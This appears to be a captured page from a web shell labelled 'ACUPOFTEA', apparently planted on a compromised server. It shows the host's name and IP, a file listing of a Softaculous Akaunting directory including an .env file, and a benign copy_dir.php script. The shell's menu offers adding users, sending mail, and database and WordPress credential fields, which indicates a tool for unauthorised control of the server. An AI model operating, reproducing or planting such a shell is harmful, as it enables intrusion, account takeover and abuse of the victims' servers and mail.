System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
akaunting
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
copy_dir.php
<?php @unlink('copy_dir.php'); $src = '[[srcpath]]/storage/app/uploads'; $dst = '[[softpath]]/storage/app/uploads'; function copy_r($path, $dest){ // Is it a Directory ? if( is_dir($path) ){ // Create the Destination Dir @mkdir($dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } // Start reading the current directory $objects = scandir($path); if( sizeof($objects) > 0 ){ foreach( $objects as $file ) { if( $file == "." || $file == ".." ){ continue; } // Go on copy_r( $path.'/'.$file, $dest.'/'.$file ); } } return true; }elseif( is_file($path) ){ //To exclude some files if set in script's clone.php's __pre_unzip() function $ret = copy($path, $dest); $stat = stat($path); // Set the mode of the destination if(!empty($stat['mode'])){ @chmod($dest, $stat['mode']); } // Set the UID if(!empty($stat['uid'])){ @chown($dest, $stat['uid']); } // Set the GID if(!empty($stat['gid'])){ @chgrp($dest, $stat['gid']); } return $ret; }else{ return false; } } copy_r($src, $dst);
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
php53
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
php56
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
php71
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
php81
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
php82
DIR
-
drwxr-xr-x
2025-07-24 09:38:50
.env
text/plain
727 B
-rw-r--r--
2022-06-02 07:46:46
clone.php
text/x-php
4.71 KB
-rw-r--r--
2025-07-23 07:14:52
copy_dir.php
text/x-php
1.33 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.36 KB
-rw-r--r--
2025-07-23 07:14:52
edit.xml
text/html
447 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
9.99 KB
-rw-r--r--
2025-07-23 07:14:52
fileindex.php
text/plain
254 B
-rw-r--r--
2025-02-17 04:42:34
import.php
text/x-php
3.55 KB
-rw-r--r--
2025-07-23 07:14:52
info.xml
text/html
5.31 KB
-rw-r--r--
2025-07-23 05:33:04
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
4.19 KB
-rw-r--r--
2025-07-23 07:14:52
install.xml
text/html
2.94 KB
-rw-r--r--
2022-06-27 08:19:40
md5
text/plain
1.98 KB
-rw-r--r--
2025-07-23 07:14:52
notes.txt
text/plain
722 B
-rw-r--r--
2023-10-09 06:53:50
update_pass.php
text/x-php
555 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com